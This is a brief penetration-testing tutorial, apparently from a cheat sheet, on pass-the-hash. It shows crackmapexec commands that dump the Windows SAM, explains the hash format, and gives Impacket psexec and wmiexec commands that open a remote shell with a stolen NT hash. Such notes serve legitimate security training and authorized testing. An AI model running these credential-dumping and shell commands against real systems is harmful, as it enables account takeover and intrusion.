Pass The Hash

Windows

If you have credentials for a user who is local Administrator on the box (crackmapexec prints (Pwn3d!) when that is the case), you can dump the SAM, which stores the NT hashes of the local accounts' passwords, not the passwords themselves:

crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD'
...
SMB         10.10.10.10    445    LOCAL       [+] local\USERNAME:PASSWORD (Pwn3d!)

Then dump the SAM with crackmapexec:

crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD' --sam
...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...USERNAME:1000:aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5:::
...user3$:1002:aad3b435b51404eeaad3b435b51404ee:ed3c759dafa8d554e038c2152aa67cb3:::
...user1:1003:aad3b435b51404eeaad3b435b51404ee:3a7ac3205a1b5d1fcd63fb5d509a6d67:::

Each line is user:RID:LM-hash:NT-hash:::. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string (modern Windows does not store LM hashes), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so Administrator and Guest have no usable password here. The NT hash is unsalted and is exactly what NTLM authentication proves knowledge of, so there is no need to crack it: pass LM:NT to -hashes in the Impacket example scripts and you get a command shell as that user:

psexec.py USERNAME@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5
wmiexec.py USERNAME@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5

Or, if you have the plaintext password, simply with credentials:

psexec.py USERNAME:PASSWORD@10.10.10.10
wmiexec.py USERNAME:PASSWORD@10.10.10.10
